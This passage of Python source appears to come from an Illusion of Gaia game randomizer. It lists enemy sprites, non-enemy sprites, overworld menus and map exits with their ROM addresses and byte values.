61: [7, b"\x51\xea\x8a", b"\x2c", 2, True, True, "Steelbones"],
62: [7, b"\x33\xef\x8a", b"\x2e", 1, True, True, "Draco"], # False for now...
63: [7, b"\xc7\xf0\x8a", b"\x2e", 1, True, True, "Ramskull"],
# Great Wall
70: [8, b"\x55\x91\x8b", b"\x33", 2, True, True, "Archer 1"],
71: [8, b"\xfe\x8e\x8b", b"\x33", 2, True, False, "Archer Statue"],
72: [8, b"\xbe\x8d\x8b", b"\x34", 2, True, True, "Eyesore"],
73: [8, b"\x70\x8c\x8b", b"\x35", 3, False, True, "Fire Bug 1"],
74: [8, b"\x70\x8c\x8b", b"\x33", 3, False, False, "Fire Bug 2"],
75: [8, b"\x23\x94\x8b", b"\x32", 2, True, True, "Asp"],
76: [8, b"\x65\x91\x8b", b"\x33", 2, True, False, "Archer 2"],
77: [8, b"\x77\x91\x8b", b"\x33", 2, True, False, "Archer 3"],
78: [8, b"\x72\x8f\x8b", b"\x46", 2, True, False, "Archer Statue (switch) 1"],
79: [8, b"\x4f\x8f\x8b", b"\x33", 2, True, False, "Archer Statue (switch) 2"],
# Mt. Kress
80: [9, b"\xac\x9b\x8b", b"\x3e", 3, True, True, "Skulker (N/S)"],
81: [9, b"\x4e\x9c\x8b", b"\x3e", 3, True, True, "Skulker (E/W)"],
82: [9, b"\x44\x9c\x8b", b"\x3e", 3, True, False, "Skulker (E/W)"],
83: [9, b"\xa2\x9b\x8b", b"\x3e", 3, True, False, "Skulker (E/W)"],
84: [9, b"\x8b\x9e\x8b", b"\x3d", 3, False, True, "Yorrick (E/W)"],
85: [9, b"\x53\x9f\x8b", b"\x3d", 3, False, False, "Yorrick (E/W)"],
86: [9, b"\x0f\x9d\x8b", b"\x3d", 3, False, True, "Yorrick (N/S)"],
87: [9, b"\xcd\x9d\x8b", b"\x3d", 3, False, False, "Yorrick (N/S)"],
88: [9, b"\x3b\x98\x8b", b"\x3f", 3, False, True, "Fire Sprite"],
89: [9, b"\xcf\xa0\x8b", b"\x3c", 2, True, True, "Acid Splasher"],
90: [9, b"\xa1\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary E)"],
91: [9, b"\x75\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary W)"],
92: [9, b"\x49\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary S)"],
93: [9, b"\x1d\xa0\x8b", b"\x3c", 2, True, False, "Acid Splasher (stationary N)"],
# Ankor Wat
100: [10, b"\xd7\xb1\x8b", b"\x49", 2, True, True, "Shrubber"],
101: [10, b"\xb4\xb1\x8b", b"\x49", 2, True, False, "Shrubber 2"],
102: [10, b"\x75\xb2\x8b", b"\x46", 2, True, True, "Zombie"],
103: [10, b"\x4f\xaf\x8b", b"\x4a", 3, True, True, "Zip Fly"], # False for now...
104: [11, b"\x8d\xbd\x8b", b"\x42", 3, True, True, "Goldcap"],
105: [11, b"\x25\xb8\x8b", b"\x45", 2, True, True, "Gorgon"],
106: [11, b"\x17\xb8\x8b", b"\x45", 2, True, False, "Gorgon (jump down)"],
107: [11, b"\xbb\xbf\x8b", b"\x43", 2, True, False, "Frenzie"],
108: [11, b"\xd0\xbf\x8b", b"\x43", 2, True, True, "Frenzie 2"],
109: [11, b"\x66\xbb\x8b", b"\x44", 1, False, True, "Wall Walker"],
110: [11, b"\x66\xbb\x8b", b"\x3a", 1, False, False, "Wall Walker 2"],
111: [11, b"\x5c\xbb\x8b", b"\x44", 1, False, False, "Wall Walker 3"],
112: [11, b"\x5c\xbb\x8b", b"\x3a", 1, False, False, "Wall Walker 4"],
113: [11, b"\xaf\x99\x88", b"\x45", 2, True, False, "Gorgon (block)"],
# Pyramid
120: [12, b"\x5f\xc6\x8b", b"\x4f", 1, True, True, "Mystic Ball (stationary)"],
121: [12, b"\xfc\xc5\x8b", b"\x4f", 2, True, True, "Mystic Ball"],
122: [12, b"\xa3\xc5\x8b", b"\x4f", 2, True, True, "Mystic Ball"],
123: [12, b"\x9d\xc3\x8b", b"\x4e", 2, True, True, "Tuts"],
124: [12, b"\x98\xc7\x8b", b"\x51", 1, True, True, "Blaster"],
125: [12, b"\x84\xc1\x8b", b"\x4c", 2, True, False, "Haunt (stationary)"],
126: [12, b"\xa7\xc1\x8b", b"\x4c", 2, True, True, "Haunt"],
# Babel Tower
# 130: [14,b"\xd7\x99\x8a",b"\x5a","Castoth (boss)"],
# 131: [14,b"\xd5\xd0\x8a",b"\x5b","Viper (boss)"],
# 132: [14,b"\x50\xf1\x8a",b"\x5c","Vampire (boss)"],
# 133: [14,b"\x9c\xf1\x8a",b"\x5c","Vampire (boss)"],
# 134: [14,b"\x00\x80\x8b",b"\x5d","Sand Fanger (boss)"],
# 135: [14,b"\x1a\xa6\x8b",b"\x5e","Mummy Queen (boss)"],
# Jeweler's Mansion
140: [13, b"\xca\xaa\x8a", b"\x61", 2, True, True, "Flayzer"],
141: [13, b"\xf5\xaf\x8a", b"\x63", 1, True, True, "Grundit"],
142: [13, b"\xd8\xb0\x8a", b"\x62", 2, True, False, "Eye Stalker 1"],
143: [13, b"\x03\xb1\x8a", b"\x62", 2, True, True, "Eye Stalker 2"]
# Bosses
# 24: [15,b"\x03\x9b\x8a",b"\x14","Castoth (boss)"],
# 45: [15,b"\x6f\xd1\x8a",b"\x27","Viper (boss)"],
# 55: [15,b"\xf7\xf1\x8a",b"\x2f","Vampire (boss)"],
# 56: [15,b"\xc8\xf3\x8a",b"\x30","Vampire (boss)"],
# 79: [15,b"\x5c\x81\x8b",b"\x36","Sand Fanger (boss)"],
# 128: [15,b"\xb6\xa6\x8b",b"\x50","Mummy Queen (boss)"],
# 143: [15,b"\x09\xf7\x88",b"\x5f","Solid Arm (boss)"],
# 140: [15,b"\xaa\xee\x8c",b"\x54","Dark Gaia"]
}
# Database of non-enemy sprites to disable in enemizer
# FORMAT: { ID: [Enemyset, Event addr, Name]}
self.nonenemy_sprites = {
# Underground Tunnel
0: [0, "a8835", "Movable statue"],
1: [0, "a87ce", "Falling spear 1"],
2: [0, "a87c3", "Falling spear 2"],
3: [0, "a8aae", "Spike ball 1"],
4: [0, "a8a0f", "Spike ball 2"],
5: [0, "a8a7d", "Spike ball 3"],
6: [0, "a8a46", "Spike ball 4"],
7: [0, "a89de", "Spike ball 5"],
# Inca Ruins
10: [1, "9c26f", "Skeleton 1"],
11: [1, "9c798", "Skeleton 2"],
# 12: [1,"9c89d","Skeleton 3"], # Spriteset already restricted for this room
13: [1, "9c8f7", "Skeleton 4"],
14: [1, "a8896", "Broken statue (chest)"],
15: [1, "a88de", "Broken statue (blockade)"],
# Diamond Mine
20: [3, "5d6a8", "Elevator sign"],
21: [3, "aa4f5", "Elevator platform 1"],
22: [3, "aa50c", "Elevator platform 2"],
23: [3, "aa4e2", "Elevator platform 3"],
# Sky Garden
30: [4, "5f8c0", "Broken statue"],
31: [4, "ac0fe", "Sword statue 1"],
# 32: [4,"ac150","Sword statue 2"],
33: [4, "ac3b3", "Sword statue 3"],
# 34: [4,"ac409","Sword statue 4"],
35: [4, "accd4", "Fire snake (top)"],
36: [5, "accf1", "Fire snake (bottom)"],
# Mu
40: [6, "69ce9", "Floor spikes 1"],
41: [6, "69d1f", "Floor spikes 2"],
42: [6, "ae943", "Fire snake"],
# 43: [6,"69d4d","Donut"],
# Angel
50: [7, "6d56f", "Flame 1"],
51: [7, "6d57e", "Flame 2"],
52: [7, "6d58f", "Flame 3"],
# Great Wall
60: [8, "b8c30", "Wall spike 1"],
61: [8, "b8bf8", "Wall spike 2"],
62: [8, "7bd17", "Wall spike 3"],
63: [8, "7bd46", "Wall spike 4"],
64: [8, "7bd75", "Wall spike 5"],
65: [8, "7bce8", "Wall spike 5"],
# Mt Kress (nothing)
# Ankor Wat
80: [11, "89f2c", "Floating crystal"],
81: [11, "89ffc", "Skeleton 1"],
82: [11, "8a25e", "Skeleton 2"]
# Pyramid
# 90: [12,"8b6a2","Warp point"],
# 91: [12,"8cd6c","Warp point"],
# Jeweler's Mansion (nothing)
}
# Database of overworld menus
# FORMAT: { ID: [ShuffleID (0=no shuffle), Menu_ID, FromRegion, ToRegion, ROM_EntranceData, ROM_TextLoc, MenuText, ContinentName, AreaName]}
self.overworld_menus = {
# SW Continent "\x01"
1: [0, b"\x01", 10, 20, "3b95b", "0cafd", "3b590", "SW Continent", "South Cape"],
2: [0, b"\x01", 10, 30, "3b96b", "0cb26", "3b5a9", "SW Continent", "Edward's"],
3: [0, b"\x01", 10, 50, "3b97b", "0cb5b", "3b5b5", "SW Continent", "Itory"],
4: [0, b"\x01", 10, 60, "3b98b", "4f453", "3b5c2", "SW Continent", "Moon Tribe"],
5: [0, b"\x01", 10, 63, "3b99b", "0cb74", "3b59c", "SW Continent", "Inca"],
# SE Continent "\x07"
6: [0, b"\x07", 11, 102, "3b9ab", "5aab7", "3b5ef", "SE Continent", "Diamond Coast"],
7: [0, b"\x07", 11, 110, "3b9bb", "0cba3", "3b5e3", "SE Continent", "Freejia"],
8: [0, b"\x07", 11, 133, "3b9cb", "0cbbc", "3b608", "SE Continent", "Diamond Mine"],
9: [0, b"\x07", 11, 160, "3b9db", "5e31e", "3b615", "SE Continent", "Neil's"],
10: [0, b"\x07", 11, 162, "3b9eb", "5e812", "3b5fc", "SE Continent", "Nazca"],
# NE Continent "\x0a"
11: [0, b"\x0a", 12, 250, "3ba1b", "0cbeb", "3b642", "NE Continent", "Angel Village"],
12: [0, b"\x0a", 12, 280, "3ba2b", "0cc30", "3b636", "NE Continent", "Watermia"],
13: [0, b"\x0a", 12, 290, "3ba3b", "0cc49", "3b64f", "NE Continent", "Great Wall"],
# N Continent "\x0f"
14: [0, b"\x0f", 13, 310, "3ba4b", "0cc8e", "3b660", "N Continent", "Euro"],
15: [0, b"\x0f", 13, 330, "3ba5b", "0cca7", "3b66c", "N Continent", "Mt. Temple"],
16: [0, b"\x0f", 13, 350, "3ba6b", "0ccec", "3b679", "N Continent", "Native's Village"],
17: [0, b"\x0f", 13, 360, "3ba7b", "0cd05", "3b685", "N Continent", "Ankor Wat"],
# NW Continent Overworld "\x16"
18: [0, b"\x16", 14, 400, "3ba8b", "0cd24", "3b696", "NW Continent", "Dao"],
19: [0, b"\x16", 14, 410, "3ba9b", "0cd55", "3b6a3", "NW Continent", "Pyramid"]
}
# Database of special map exits that don't conform to the typical "02 26" format, IDs correspond to self.exits
# FORMAT: { ID: [MapAddr, Xaddr, Yaddr, FaceDirAddr, CameraAddr]}
self.exits_detailed = {
15: ["8ce31", "8ce37", "8ce40", "", "8ce49"] # Mummy Queen exit
}
# Database of map exits
# FORMAT: { ID: [CoupleID (0 if one-way), ShuffleTo (0 if no shuffle), ShuffleFrom (0 if no shuffle), FromRegion, ToRegion,
# ROM_Location, DestString,BossFlag, DungeonFlag, DungeonEntranceFlag, Name]}
self.exits = {
# Bosses
1: [ 2, 0, 0, 78, 97, "18872", b"\x29\x78\x00\xC0\x00\x00\x00\x11", True, True, False, "Castoth entrance (in)"],
2: [ 1, 0, 0, 0, 0, "189e4", b"\x1E\x68\x00\x00\x01\x03\x00\x24", True, True, False, "Castoth entrance (out)"],
3: [ 0, 0, 0, 104, 102, "584cc", b"\x30\x48\x00\x10\x01\x83\x00\x21", True, True, False, "Diamond Coast passage (Gold Ship)"],
4: [ 5, 0, 0, 171, 198, "18e20", b"\x55\x70\x00\xE0\x01\x00\x00\x22", True, True, False, "Viper entrance (in)"],
5: [ 4, 0, 0, 0, 0, "19006", b"\x4C\xF8\x00\x30\x00\x03\x00\x22", True, True, False, "Viper entrance (out)"],
6: [ 0, 0, 0, 198, 200, "acece", b"\x5A\x90\x00\x70\x00\x83\x00\x14", True, True, False, "Seaside Palace passage (Viper)"],
7: [ 8, 0, 0, 241, 243, "69c62", b"\x67\x78\x01\xd0\x01\x80\x01\x22", True, True, False, "Vampires entrance (in)"],
8: [ 7, 0, 0, 0, 0, "193f8", b"\x65\xb8\x00\x80\x02\x03\x00\x44", True, True, False, "Vampires entrance (out)"],
9: [ 0, 0, 0, 242, 212, "193ea", b"\x5f\x80\x00\x50\x00\x83\x00\x44", True, True, False, "Vampires exit"],
10: [11, 0, 0, 301, 302, "19c2a", b"\x8A\x50\x00\x90\x00\x87\x00\x33", True, True, False, "Sand Fanger entrance (in)"],
11: [10, 0, 0, 0, 0, "19c78", b"\x88\xE0\x03\x90\x00\x06\x00\x14", True, True, False, "Sand Fanger entrance (out)"],
12: [ 0, 0, 0, 303, 290, "19c84", b"\x82\x10\x00\x90\x00\x87\x00\x18", True, True, False, "Sand Fanger exit"],
13: [14, 0, 0, 414, 448, "8cdcf", b"\xDD\xF8\x00\xB0\x01\x00\x00\x22", True, True, False, "Mummy Queen entrance (in)"],
14: [13, 0, 0, 0, 0, "", b"\xCC\xF8\x01\x20\x01\x03\x00\x44", True, True, False, "Mummy Queen entrance (out)"], # fake
15: [ 0, 0, 0, 448, 415, "", b"\xCD\x70\x00\x90\x00\x83\x00\x11", True, True, False, "Mummy Queen exit"], # This one's dumb, see exits_detailed
16: [17, 0, 0, 470, 471, "1a8c2", b"\xE3\xD8\x00\x90\x03\x83\x30\x44", True, True, False, "Babel entrance (in)"],
17: [16, 0, 0, 0, 0, "1a8d0", b"\xE2\xD0\x00\xE0\x00\x03\x00\x84", True, True, False, "Babel entrance (out)"],
18: [ 0, 0, 0, 472, 400, "9804a", b"\xC3\x10\x02\x90\x00\x83\x00\x23", True, True, False, "Dao passage (Babel)"],
19: [20, 0, 0, 481, 482, "1a94e", b"\xEA\x78\x00\xC0\x00\x00\x00\x11", True, True, False, "Solid Arm entrance (in)"],
20: [19, 0, 0, 0, 0, "", b"\xE9\x78\x03\x90\x00\x03\x00\x44", True, True, False, "Solid Arm entrance (out)"], # fake
21: [ 0, 0, 0, 472, 400, "", b"\xC3\x10\x02\x90\x00\x83\x00\x23", True, True, False, "Dao passage (Solid Arm)"], # fake
# 21: [ 0, 0, 0, 482, 472, "", b"\xE3\x80\x02\xB0\x01\x80\x10\x23", True, True, False, "Babel passage (Solid Arm)"], # This one stays, @98115
# Passage Menus
22: [0, 0, 0, 15, 28, "", b"", False, False, False, "Seth: Passage 1 (South Cape)"],
23: [0, 0, 0, 15, 102, "", b"", False, False, False, "Seth: Passage 2 (Diamond Coast)"],
24: [0, 0, 0, 15, 280, "", b"", False, False, False, "Seth: Passage 3 (Watermia)"],
25: [0, 0, 0, 16, 60, "", b"", False, False, False, "Moon Tribe: Passage 1 (Moon Tribe)"],
26: [0, 0, 0, 16, 200, "", b"", False, False, False, "Moon Tribe: Passage 2 (Seaside Palace)"],
27: [0, 0, 0, 17, 161, "", b"", False, False, False, "Neil: Passage 1 (Neil's)"],
28: [0, 0, 0, 17, 314, "", b"", False, False, False, "Neil: Passage 2 (Euro)"],
29: [0, 0, 0, 17, 402, "", b"", False, False, False, "Neil: Passage 3 (Dao)"],
30: [0, 0, 0, 17, 460, "", b"", False, False, False, "Neil: Passage 4 (Babel)"],
# South Cape
31: [32, 0, 0, 20, 22, "18444", b"", False, False, False, "South Cape: School main (in)"], # Duplicate exit at 18438?
32: [31, 0, 0, 0, 0, "1856c", b"", False, False, False, "South Cape: School main (out)"],
33: [34, 0, 0, 21, 22, "18498", b"", False, False, False, "South Cape: School roof (in)"],
34: [33, 0, 0, 0, 0, "18560", b"", False, False, False, "South Cape: School roof (out)"],
35: [36, 0, 0, 20, 23, "18474", b"", False, False, False, "South Cape: Will's House (in)"],
36: [35, 0, 0, 0, 0, "1852a", b"", False, False, False, "South Cape: Will's House (out)"],
37: [38, 0, 0, 20, 24, "18480", b"", False, False, False, "South Cape: East House (in)"],
38: [37, 0, 0, 0, 0, "18552", b"", False, False, False, "South Cape: East House (out)"],
39: [40, 0, 0, 20, 27, "1845c", b"", False, False, False, "South Cape: Erik's House main (in)"],
40: [39, 0, 0, 0, 0, "184e8", b"", False, False, False, "South Cape: Erik's House main (out)"],
41: [42, 0, 0, 20, 27, "184a4", b"", False, False, False, "South Cape: Erik's House roof (in)"],
42: [41, 0, 0, 0, 0, "184f4", b"", False, False, False, "South Cape: Erik's House roof (out)"],
43: [44, 0, 0, 20, 26, "18450", b"", False, False, False, "South Cape: Lance's House (in)"],
44: [43, 0, 0, 0, 0, "184c0", b"", False, False, False, "South Cape: Lance's House (out)"],
45: [46, 0, 0, 20, 25, "18468", b"", False, False, False, "South Cape: Seth's House (in)"],
46: [45, 0, 0, 0, 0, "1851c", b"", False, False, False, "South Cape: Seth's House (out)"],
47: [48, 0, 0, 20, 28, "1848c", b"", False, False, False, "South Cape: Seaside Cave (in)"],
48: [47, 0, 0, 0, 0, "4be6a", b"", False, False, False, "South Cape: Seaside Cave (out)"],
# Edward's / Prison
50: [51, 0, 0, 31, 49, "1857c", b"", False, True, True, "Tunnel back entrance (in)"],
51: [50, 0, 0, 0, 0, "186f4", b"", False, True, True, "Tunnel back entrance (out)"],
52: [53, 0, 0, 33, 40, "1860c", b"\x0C\x58\x00\x50\x00\x83\x00\x12", False, True, True, "Tunnel entrance (in)"], # set checkpoint
53: [52, 0, 0, 0, 0, "18626", b"", False, True, True, "Tunnel entrance (out)"],
54: [ 0, 0, 0, 30, 32, "4c755", b"", False, False, False, "Prison entrance (king)"],
#55: [54, 0, 0, 0, 2, "", b"\x0a\xe0\x01\x60\x01\x03\x20\x34", False, False, False, "Prison exit (king), fake"],
# Tunnel
60: [61, 0, 0, 40, 41, "18632", b"", False, True, False, "Tunnel: Map 12 to Map 13"],
61: [60, 0, 0, 0, 0, "18640", b"", False, True, False, "Tunnel: Map 13 to Map 12"],
62: [63, 0, 0, 41, 42, "1864c", b"", False, True, False, "Tunnel: Map 13 to Map 14"],
63: [62, 0, 0, 0, 0, "1865a", b"", False, True, False, "Tunnel: Map 14 to Map 13"],
64: [65, 0, 0, 42, 43, "18666", b"", False, True, False, "Tunnel: Map 14 to Map 15"],
65: [64, 0, 0, 0, 0, "18680", b"", False, True, False, "Tunnel: Map 15 to Map 14"],
66: [67, 0, 0, 43, 44, "1868c", b"", False, True, False, "Tunnel: Map 15 to Map 16"],
67: [66, 0, 0, 0, 0, "1869a", b"", False, True, False, "Tunnel: Map 16 to Map 15"],
68: [69, 0, 0, 43, 45, "18674", b"", False, True, False, "Tunnel: Map 15 to Map 17"],
69: [68, 0, 0, 0, 0, "186a8", b"", False, True, False, "Tunnel: Map 17 to Map 15"],
70: [71, 0, 0, 46, 47, "186b4", b"", False, True, False, "Tunnel: Map 17 to Map 18"],
71: [70, 0, 0, 0, 0, "186c2", b"", False, True, False, "Tunnel: Map 18 to Map 17"],
72: [73, 0, 0, 48, 49, "186ce", b"", False, True, False, "Tunnel: Map 18 to Map 19"],
73: [72, 0, 0, 0, 0, "186e8", b"", False, True, False, "Tunnel: Map 19 to Map 18"],
# Itory
80: [81, 0, 0, 51, 53, "18704", b"", False, False, False, "Itory: West House (in)"],
81: [80, 0, 0, 0, 0, "1874e", b"", False, False, False, "Itory: West House (out)"],
82: [83, 0, 0, 51, 54, "18728", b"", False, False, False, "Itory: North House (in)"],
83: [82, 0, 0, 0, 0, "18776", b"", False, False, False, "Itory: North House (out)"],
84: [85, 0, 0, 51, 55, "18710", b"", False, False, False, "Itory: Lilly Front Door (in)"],
85: [84, 0, 0, 0, 0, "1875c", b"", False, False, False, "Itory: Lilly Front Door (out)"],
86: [87, 0, 0, 52, 55, "1871c", b"", False, False, False, "Itory: Lilly Back Door (in)"],
87: [86, 0, 0, 0, 0, "18768", b"", False, False, False, "Itory: Lilly Back Door (out)"],
88: [89, 0, 0, 51, 56, "18734", b"", False, False, False, "Itory Cave (in)"],
89: [88, 0, 0, 0, 0, "18784", b"", False, False, False, "Itory Cave (out)"],
90: [91, 0, 0, 57, 58, "18790", b"", False, False, False, "Itory Cave Hidden Room (in)"], # always linked?
91: [90, 0, 0, 0, 0, "1879c", b"", False, False, False, "Itory Cave Hidden Room (out)"],
# Moon Tribe
100: [101, 0, 0, 60, 61, "187b6", b"", False, False, False, "Moon Tribe Cave (in)"],
101: [100, 0, 0, 0, 0, "187c4", b"", False, False, False, "Moon Tribe Cave (out)"],
102: [ 0, 0, 0, 64, 170, "9d1ea", b"", False, True, True, "Moon Tribe: Sky Garden passage"],
# Inca
110: [111, 0, 0, 63, 70, "187d2", b"", False, True, True, "Inca Ruins entrance (in)"],
111: [110, 0, 0, 0, 0, "187e0", b"", False, True, True, "Inca Ruins entrance (out)"],
#114: [ 0, 0, 0, 65, 102, "", b"", False, False, True, "Inca: Diamond Coast passage"],
# Inca Ruins
120: [121, 0, 0, 70, 89, "", b"", False, True, False, "Inca: Map 29 to Map 37 (E)"],
121: [120, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 37 to Map 29 (E)"],
122: [123, 0, 0, 89, 94, "", b"", False, True, False, "Inca: Map 37 to Map 39"],
123: [122, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 39 to Map 37"],
124: [125, 0, 0, 94, 71, "", b"", False, True, False, "Inca: Map 39 to Map 29"],
125: [124, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 39"],
126: [127, 0, 0, 90, 72, "", b"", False, True, False, "Inca: Map 37 to Map 29 (W)"],
127: [126, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 37 (W)"],
128: [129, 0, 0, 72, 91, "", b"", False, True, False, "Inca: Map 29 to Map 38"],
129: [128, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 38 to Map 29"],
130: [131, 0, 0, 73, 80, "", b"", False, True, False, "Inca: Map 29 to Map 32"],
131: [130, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 32 to Map 29"],
132: [133, 0, 0, 81, 85, "", b"", False, True, False, "Inca: Map 32 to Map 35"],
133: [132, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 35 to Map 32"],
134: [135, 0, 0, 85, 74, "", b"", False, True, False, "Inca: Map 35 to Map 29"],
135: [134, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 35 to Map 29"],
136: [137, 0, 0, 74, 79, "", b"", False, True, False, "Inca: Map 29 to Map 31"],
137: [136, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 31 to Map 29"],
138: [139, 0, 0, 79, 95, "", b"", False, True, False, "Inca: Map 31 to Map 40"],
139: [138, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 40 to Map 31"],
140: [141, 0, 0, 96, 76, "", b"", False, True, False, "Inca: Map 40 to Map 29"],
141: [140, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 40"],
142: [143, 0, 0, 86, 82, "", b"", False, True, False, "Inca: Map 35 to Map 33"],
143: [142, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 33 to Map 35"],
144: [145, 0, 0, 83, 75, "", b"", False, True, False, "Inca: Map 33 to Map 29"],
145: [144, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 29 to Map 33"],
146: [147, 0, 0, 99, 84, "", b"", False, True, False, "Inca: Map 29 to Map 34"], # Special case to allow for Z-ladder glitch
147: [146, 0, 0, 84, 75, "", b"", False, True, False, "Inca: Map 34 to Map 29"],
148: [149, 0, 0, 84, 93, "", b"", False, True, False, "Inca: Map 34 to Map 38"],
149: [148, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 38 to Map 34"],
150: [151, 0, 0, 84, 87, "", b"", False, True, False, "Inca: Map 34 to Map 36"],
151: [150, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 36 to Map 34"],
152: [153, 0, 0, 88, 77, "", b"", False, True, False, "Inca: Map 36 to Map 30"],
153: [152, 0, 0, 0, 0, "", b"", False, True, False, "Inca: Map 30 to Map 36"],
154: [ 0, 0, 0, 98, 100, "", b"", False, True, False, "Gold Ship entrance"],
# Gold Ship
160: [161, 0, 0, 100, 101, "", b"", False, False, False, "Gold Ship Interior (in)"],
161: [160, 0, 0, 0, 0, "", b"", False, False, False, "Gold Ship Interior (out)"],
# Diamond Coast
172: [173, 0, 0, 102, 103, "18aa0", b"", False, False, False, "Coast House (in)"],
173: [172, 0, 0, 0, 0, "18aae", b"", False, False, False, "Coast House (out)"],
# Freejia
182: [183, 0, 0, 110, 116, "18aec", b"", False, False, False, "Freejia: West House (in)"],
183: [182, 0, 0, 0, 0, "18b9c", b"", False, False, False, "Freejia: West House (out)"],
184: [185, 0, 0, 110, 117, "18af8", b"", False, False, False, "Freejia: 2-story House (in)"],
185: [184, 0, 0, 0, 0, "18bc4", b"", False, False, False, "Freejia: 2-story House (out)"],
186: [187, 0, 0, 111, 117, "18b04", b"", False, False, False, "Freejia: 2-story Roof (in)"],
187: [186, 0, 0, 0, 0, "18bd0", b"", False, False, False, "Freejia: 2-story Roof (out)"],
188: [189, 0, 0, 110, 118, "18b10", b"", False, False, False, "Freejia: Lovers' House (in)"],
189: [188, 0, 0, 0, 0, "18bf8", b"", False, False, False, "Freejia: Lovers' House (out)"],
190: [191, 0, 0, 110, 119, "18b1c", b"", False, False, False, "Freejia: Hotel (in)"],
191: [190, 0, 0, 0, 0, "18c20", b"", False, False, False, "Freejia: Hotel (out)"],
192: [193, 0, 0, 119, 120, "18c2c", b"", False, False, False, "Freejia: Hotel West Room (in)"],
193: [192, 0, 0, 0, 0, "18c44", b"", False, False, False, "Freejia: Hotel West Room (out)"],
194: [195, 0, 0, 119, 121, "18c38", b"", False, False, False, "Freejia: Hotel East Room (in)"],
195: [194, 0, 0, 0, 0, "18c50", b"", False, False, False, "Freejia: Hotel East Room (out)"],
196: [197, 0, 0, 110, 122, "18b28", b"", False, False, False, "Freejia: Laborer House (in)"], # might take this out?
197: [196, 0, 0, 0, 0, "18c84", b"", False, False, False, "Freejia: Laborer House (out)"],
198: [199, 0, 0, 112, 122, "18b34", b"", False, False, False, "Freejia: Laborer Roof (in)"],
199: [198, 0, 0, 0, 0, "18c78", b"", False, False, False, "Freejia: Laborer Roof (out)"],
200: [201, 0, 0, 110, 123, "18b40", b"", False, False, False, "Freejia: Messy House (in)"],
201: [200, 0, 0, 0, 0, "18c92", b"", False, False, False, "Freejia: Messy House (out)"],
202: [203, 0, 0, 110, 124, "18abc", b"", False, False, False, "Freejia: Erik House (in)"],
203: [202, 0, 0, 0, 0, "18b5a", b"", False, False, False, "Freejia: Erik House (out)"],
204: [205, 0, 0, 110, 125, "18ac8", b"", False, False, False, "Freejia: Dark Space House (in)"],
205: [204, 0, 0, 0, 0, "18b68", b"", False, False, False, "Freejia: Dark Space House (out)"],
206: [207, 0, 0, 110, 126, "18ad4", b"", False, False, False, "Freejia: Labor Trade House (in)"],
207: [206, 0, 0, 0, 0, "18b82", b"", False, False, False, "Freejia: Labor Trade House (out)"],
208: [209, 0, 0, 113, 126, "18ae0", b"", False, False, False, "Freejia: Labor Trade Roof (in)"],
209: [208, 0, 0, 0, 0, "18b8e", b"", False, False, False, "Freejia: Labor Trade Roof (out)"],
210: [211, 0, 0, 114, 127, "18b4c", b"", False, False, False, "Freejia: Labor Market (in)"],
211: [210, 0, 0, 0, 0, "18ca0", b"", False, False, False, "Freejia: Labor Market (out)"],
# Diamond Mine
222: [223, 0, 0, 133, 134, "", b"", False, True, False, "Diamond Mine: Map 62 to Map 63"],
223: [222, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 62"],
224: [225, 0, 0, 135, 140, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 66"],
225: [224, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 63"],
226: [227, 0, 0, 134, 136, "", b"", False, True, False, "Diamond Mine: Map 63 to Map 64"],
227: [226, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 64 to Map 63"],
228: [229, 0, 0, 136, 138, "", b"", False, True, False, "Diamond Mine: Map 64 to Map 65"],
229: [228, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 64"],
230: [231, 0, 0, 139, 143, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 66"],
231: [230, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 65"],
232: [233, 0, 0, 138, 130, "", b"", False, True, False, "Diamond Mine: Map 65 to Map 61"],
233: [232, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 61 to Map 65"],
234: [235, 0, 0, 132, 142, "", b"", False, True, False, "Diamond Mine: Map 61 to Map 66"],
235: [234, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 61"],
236: [237, 0, 0, 140, 144, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 67 (1)"],
237: [236, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 67 to Map 66 (1)"],
238: [239, 0, 0, 145, 141, "", b"", False, True, False, "Diamond Mine: Map 67 to Map 66 (2)"],
239: [238, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 67 (2)"],
240: [241, 0, 0, 141, 146, "", b"", False, True, False, "Diamond Mine: Map 66 to Map 68"],
241: [240, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 66"],
242: [243, 0, 0, 146, 148, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 69"],
243: [242, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 69 to Map 68"],
244: [245, 0, 0, 146, 149, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 70"],
245: [244, 0, 0, 0, 0, "", b"", False, True, False, "Diamond Mine: Map 70 to Map 68"],
246: [247, 0, 0, 147, 150, "", b"", False, True, False, "Diamond Mine: Map 68 to Map 71"],
